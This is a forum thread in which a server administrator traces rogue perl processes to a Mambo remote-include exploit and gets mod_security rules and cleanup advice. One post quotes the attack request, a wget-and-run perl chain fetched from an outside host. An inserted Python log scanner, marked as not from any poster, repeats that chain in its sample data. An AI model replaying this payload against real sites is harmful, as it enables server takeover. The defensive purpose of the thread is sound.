The Community Forums


Cannot trace process - httpsl

Discussion in 'General Discussion' started by sint19, Aug 7, 2006.

  1. sint19

    sint19 Member

    Joined:
    Feb 16, 2003
    Messages:
    6
    Likes Received:
    0
    Trophy Points:
    1
    I have a lot of httpsl processes, about 50 at the same time. Here is an example of one of them:
    [/proc/28899]# ls -al
    total 0
    dr-xr-xr-x 3 nobody nobody 0 Aug 7 19:04 ./
    dr-xr-xr-x 1522 root root 0 Aug 6 00:31 ../
    -r--r--r-- 1 nobody nobody 0 Aug 7 19:05 cmdline
    -r--r--r-- 1 nobody nobody 0 Aug 7 19:05 cpu
    lrwxrwxrwx 1 nobody nobody 0 Aug 7 19:05 cwd -> //
    -r-------- 1 nobody nobody 0 Aug 7 19:05 environ
    lrwxrwxrwx 1 nobody nobody 0 Aug 7 19:05 exe -> /usr/bin/perl*
    dr-x------ 2 nobody nobody 0 Aug 7 19:05 fd/
    -r--r--r-- 1 nobody nobody 0 Aug 7 19:05 maps
    -rw------- 1 nobody nobody 0 Aug 7 19:05 mem
    -r--r--r-- 1 nobody nobody 0 Aug 7 19:05 mounts
    lrwxrwxrwx 1 nobody nobody 0 Aug 7 19:05 root -> //
    -r--r--r-- 1 nobody nobody 0 Aug 7 19:05 stat
    -r--r--r-- 1 nobody nobody 0 Aug 7 19:05 statm
    -r--r--r-- 1 nobody nobody 0 Aug 7 19:05 status
    lsof -p 28899
    COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
    perl 28899 nobody cwd DIR 130,46 1024 456187906 /
    perl 28899 nobody rtd DIR 130,46 1024 456187906 /
    perl 28899 nobody txt REG 130,46 942729 509666453 /usr/bin/perl
    perl 28899 nobody 0r CHR 1,3 457965571 /dev/null
    perl 28899 nobody 1w FIFO 130,5 977102708 pipe
    perl 28899 nobody 2w REG 130,46 3331669 689897475 /usr/local/apache/logs/error_log
    perl 28899 nobody 3u IPv4 977413800 TCP my.server.com:34124->rm43.1blu.de:8209 (ESTABLISHED)
    perl 28899 nobody 4u unix 0xa22b77e0 977102504 socket
    perl 28899 nobody 5u unix 0x248a2760 976881059 socket
    perl 28899 nobody 15w REG 130,46 0 689897478 /usr/local/apache/logs/audit_log
    perl 28899 nobody 16w REG 130,46 0 689897485 /usr/local/apache/logs/modsec_debug_log
    perl 28899 nobody 17w REG 130,46 3331669 689897475 /usr/local/apache/logs/error_log
    ... a lot of domlogs
    For CWD (current working folder) I have only '/'.
    cat environ shows nothing.
    Any idea how to stop this? (Blocking the rm43.1blu.de IP will not solve the problem.)

    thanks
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Looks like a perl script being run through a compromised PHP script. You're going to have to wade through your domlogs to track it down.
     
  3. sint19

    sint19 Member

    Joined:
    Feb 16, 2003
    Messages:
    6
    Likes Received:
    0
    Trophy Points:
    1
    Bingo

    Thank you, I found it, but I still don't know the best way to stop this.

    203.113.132.116 - - [08/Aug/2006:01:56:47 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mischel.cz/webdesign/images/CISLA/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.mischel.cz/webdesign/images/CISla/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 200 24007 "-" "Mozilla/5.0"

    The exploit uses Mambo's ''mosConfig_absolute_path''.
    The exploit copies the mambo.txt perl script to /tmp, executes it, and deletes it.
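    As an added example (not from any poster in this thread), a small scanner for Apache domlogs that flags the request pattern shown in the log line above: a mosConfig_* global pointed at a remote URL, superglobal names such as GLOBALS= or _REQUEST[...] in the query string, and a decoded download-and-run shell chain. The sample log lines, hosts and IPs in it are constructed placeholders.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample in Apache combined-log format; hosts and IPs are placeholders, not real data.
SAMPLE_LOG = """\
203.0.113.10 - - [08/Aug/2006:01:55:12 +0200] "GET /index.php?option=com_content&Itemid=1 HTTP/1.0" 200 24007 "-" "Mozilla/5.0"
203.0.113.20 - - [08/Aug/2006:01:56:47 +0200] "GET /index.php?_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path=http://bad.example/t.gif?&cmd=cd%20/tmp/;wget%20http://bad.example/m.txt;perl%20m.txt;rm%20-rf%20m.*? HTTP/1.0" 200 24007 "-" "Mozilla/5.0"
203.0.113.30 - - [08/Aug/2006:02:01:03 +0200] "POST /administrator/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# register_globals overwrite: query names that spell a PHP superglobal (GLOBALS=, _REQUEST[option]=...)
SUPERGLOBAL_RE = re.compile(r"^(?:GLOBALS|_(?:REQUEST|GET|POST|COOKIE|SERVER|FILES|ENV|SESSION))(?:\[|$)")
# download-and-run chains visible after URL decoding (";wget http://...", "perl m.txt", "cd /tmp")
SHELL_RE = re.compile(r"(?:^|[;|&`\s])(?:wget|curl|lynx|fetch|perl|sh|bash)\s|cd\s+/tmp", re.I)

def parse_query(query):
    """Split on '&' only and percent-decode; ';' inside values is kept for the shell check."""
    params = []
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            params.append((unquote_plus(name), unquote_plus(value)))
    return params

def classify_request(target):
    """Return the reasons a request target looks like the Mambo remote-include chain (empty if clean)."""
    reasons = []
    query = urlsplit(target).query
    for name, value in parse_query(query):
        if SUPERGLOBAL_RE.match(name):
            reasons.append("superglobal:" + name)
        # a mosConfig_* global pointed at a URL is the remote-include primitive itself
        if name.startswith("mosConfig_") and re.match(r"(?i)(?:https?|ftp)://", value):
            reasons.append("remote-include:" + name)
    if SHELL_RE.search(unquote_plus(query)):
        reasons.append("shell-command")
    return reasons

def scan_log(text):
    """One finding per suspicious request line: client IP, timestamp, target and the reasons."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            reasons = classify_request(m["target"])
            if reasons:
                findings.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"], "reasons": reasons})
    return findings
```

    Run scan_log() over the contents of each file under /usr/local/apache/domlogs to get the client IPs and timestamps of the requests that launched the perl processes.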
     
  4. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Install mod_security through WHM -> Addon Scripts, then add rules such as the following to /usr/local/apache/conf/modsec.user.conf:

    SecFilter "mosConfig_absolute_path"
    SecFilter "wget"
    SecFilter "com_content"
    SecFilter "perl\x20"

    Those will easily block the widespread exploit / worm.
     
  5. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Also run killall -9 perl;killall -9 httpd;httpd stop;httpd startssl

    That will clear any old processes or running exploits, and restart apache fresh after you've installed mod security and applied the necessary paths.

    In the meantime, chmod 700 /usr/bin/wget ASAP to avoid further exploitation.
     
  6. sint19

    sint19 Member

    Joined:
    Feb 16, 2003
    Messages:
    6
    Likes Received:
    0
    Trophy Points:
    1
    All done, except

    SecFilter "com_content"

    which is needed for running Mambo, but

    SecFilter "mosConfig_absolute_path"
    SecFilter "wget"

    do a great job (HTTP Error 406 - Not Acceptable).

    Thank you
     
  7. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    I would also suggest SecFilter "perl\x20"

    as that is "perl " and will be used in almost any exploit to run any file. It's better to be safe.

    Also you can use my version at http://www.hostmerit.com/modsec.user.conf

    It's highly recommended by many users of the cPanel forums, as I code it myself and update it a lot; it was also recommended directly by cPanel in a presentation on security at HostingCon.
     